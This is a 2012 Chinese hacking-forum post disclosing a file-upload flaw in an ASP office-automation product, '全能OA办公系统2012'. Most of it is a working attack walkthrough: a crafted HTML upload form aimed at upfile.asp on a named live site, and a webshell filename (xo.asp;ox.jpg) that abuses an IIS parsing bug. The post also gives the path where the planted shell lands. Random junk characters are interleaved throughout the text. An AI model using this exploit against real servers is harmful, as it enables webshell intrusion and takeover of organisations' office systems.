找回密码
 立即注册
查看: 2638|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞# i/ [( b" \, V; i7 ]) w5 Z
) \! v* B4 }. p5 R
系统介绍:$ S* e% @( H, H

1 q3 ?7 p+ f8 e8 s# O1 f/ y5 y( l全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。% v1 w$ g( R0 T6 m* Z
9 e' ?2 I5 A2 a4 a' w8 ]5 i- f# F
主要功能:: t' [; B. b% `5 Q4 [5 T
公司通告
5 a* S- }5 h# z$ K! }/ i% e工作计划 5 G% I; j3 U) _" P1 a
通讯助理 " b* E8 i! j" m. L; K# ?" o0 X
客户资源 . V! o, ]& _6 y+ B  {
我的公文 . ^( H4 G) G8 P7 k) B
公文传阅
$ w- U5 x$ X' m公共资源
. ^1 k  J& e  s1 [9 ?2 R资源预约 5 }( D6 V1 E5 j  [- S
今日考勤
' Y; V( A! c* t7 ?! ]个人计划 4 T7 N! t  ~& L* T6 e; V6 m0 G
个人通讯录
& y* q7 b) a" H/ |个人基本档案
/ ^9 o2 H, v1 M5 A8 w" j未读邮件
4 ]# P# \9 w# ]发邮件 2 J4 `. p, u: u
收件夹 % E& [+ ~8 P  T2 T
寄件夹
; V5 Y! W: }) n( s% y" X网络硬盘
- v4 a  H) v( d; [  c2 x网络会议 - P5 [8 w) H* c  U
网络调查
2 z# G& N/ o( s交流论坛
" c+ ?% P: g5 ~
) f! U% j' f7 k% `7 z! t9 F  b有兴趣测试的朋友可以下源码看看) E2 n+ ]$ P" Z3 v  v- U/ M7 s
( T: R9 }* {0 U" I  b- I5 a- s
源码下载:4 [6 ~% n6 C  ~* p0 |

  |; S0 v/ Z7 e$ P2 i8 g) zhttp://www.mycodes.net/30/4750.htm
1 H7 z. I& r) u  f# V# u1 F0 {" s8 c+ {$ R  N
漏洞介绍:8 C6 O# v- \4 U3 J5 ]& J% ~+ o

7 |: D6 {& ^* A: m1 J由upfile.asp上传文件漏洞引起/ D' q& K" x* v  ?! r& T

5 T- ~$ q" g# J' L测试方法:
7 r4 E& z- c& X: r0 r  D
- P* `; W" ^* T9 v5 \5 A使用名小子上传http://www.itlynn.com/upfile.asp即可" L5 v2 _9 J) h; n& c7 l8 k

8 p- R8 n6 t$ ]7 a. a( m! X+ G2 z, H0 n如果upfile.asp文件被删除不存在。. Q/ {0 S  Y  b! n  y

6 p2 f) @; n8 w9 f) W$ s  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp: G  {) {6 @1 `# c; G9 I. x( H& F: k

- f6 B' l. s7 I/ }1 ^如果存在那么将如下代码保存为upfile.html。
4 Q- o6 W0 n6 N# y2 c+ U
7 a3 _3 b+ V% X( e1 o! ~+ Q+ P然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
3 w5 n  k  `& b% i9 ]9 F+ U1 _5 E8 v! ~
+ O+ V5 B5 X* }$ e( j. x

; Z  }$ U9 k0 ^% U1 ?( e! k/ F01 <table border='0' align="center" cellpadding="5">
0 c3 Y" `: K" A
6 J! l  B% U4 G' y02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> 9 I% T+ v  r% e6 N

. R& C( Z6 u* q) K+ T' E03 <tr> 5 O0 ~' B8 \3 g$ ~; k: `$ T" R

. T) M9 ^+ u$ t( |8 d+ W04             <td>报错:</td> 0 a, o! {9 i  e" A/ {8 r

$ B1 h0 J9 e8 P5 y7 y' h+ l05             <td><input type='radio' name='errnumber' value='0'> 8 v" u* Z0 ?' J5 ]: l  x0 Z( }
3 S3 H" l& ]! h/ _2 v
06               自动更名
2 o' H" t, z3 g8 g. c
* F$ M0 v2 x2 c7 X: [5 e07               <input type='radio' name='errnumber' value='1' checked> 4 d5 p9 e  Y, A' F2 U
: n- m& t  {' ~. \* z  \, w7 c
08               报错方式
8 D6 G' S! \! v: X$ t
: i5 M$ x6 u0 q5 ]% ]- Y2 l) O0 {09               <input type='radio' name='errnumber' value='2'> 0 |; p3 O1 u+ A5 C) {) @
1 j6 @* j- T2 {  \4 p, R  C
10               直接覆盖</td>
+ B, x. v" X+ R$ F
6 e! ^5 M; r7 k1 h* x0 Z  t. l) E11           </tr>
. K( J0 b& \" {5 y/ W0 R
6 o) n. \! X+ D+ J3 s% v* n12           <tr>
$ m4 o) |* q1 M, ~- j1 ^# f9 @5 r$ z' H9 H! @
13             <td>主题:</td> 6 _  q% W  ?7 c1 _. _

0 ^/ X" v) Q5 {7 T' Q14             <td><input type='text' name='filename' size='30'></td>
, [- Z  E/ V' J% ~: ]2 `6 c
9 N: z/ Z1 ]( A3 x0 e8 X4 h+ ?/ S15           </tr>
! B6 e- l2 C9 F6 L
9 ?& X9 o3 D/ U+ A# S16           <tr>
& g6 W, O/ o6 U! J2 Z3 x$ E+ B. p, i2 [: `+ b# |3 e/ Q( P( W
17             <td>文件:</td>
" B) {$ b. y% |
; H2 ^" g+ _, E7 D6 }: b6 W& E9 b; a+ i18             <td><input type="file"name="fruit"size="30"></td> - k1 `- D. L. i' L
6 S4 x5 J  A. c3 U: }9 X5 a
19           </tr> / ^& i' [9 G# c; R

% {$ \9 x4 b3 u20           <tr>
% @5 \& q: U5 v2 _" a, F) e
! i) O: m/ ~0 }7 G7 z7 k3 @- g21             <td valign='top'>简介:</td>
' `+ ~- I: j& O- ?  t7 _8 O& p
* z' E# r% C" b# ~22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> 5 k1 N0 y/ k- |& X/ `5 W  ^7 H1 E

/ ^3 e( q7 L2 Q# C7 j% P" w7 [5 t2 h23           </tr> : S* v) o' e# Z

: o8 H* ]1 v5 r0 {9 y. v24   
8 B0 D- _8 O# M0 E# N* ?1 ^  C
3 K7 f3 I, a* \1 H, g! w4 y0 V25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 9 V3 {- \( G4 K0 L% ^" e. u+ X( ~( K: M0 T
' @9 g) n) t$ w- _) Z9 W
26           </tr> 3 f, C, m: t4 S4 i+ d6 P4 D
5 Z6 R: z# t) @& {
27         </form> 2 E% C9 \. I8 B  S
8 H$ \5 E4 T2 a8 t3 m) s
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
' K- ]- y  ~) _4 P
  T& O: ~4 f. Z: L$ ^ 6 y  a. {) e6 U+ Q3 \! x2 T

2 z9 t8 i) U7 A  f0 r5 [上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg- ]$ h; M! Z- {! c8 X$ O- i
" x/ Z! n4 x0 k8 f5 B  C* h; D% P
此漏洞需要配合解析漏洞利用。0 n( M8 `2 j5 R3 Z( }/ y
3 O0 D7 T8 N/ Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表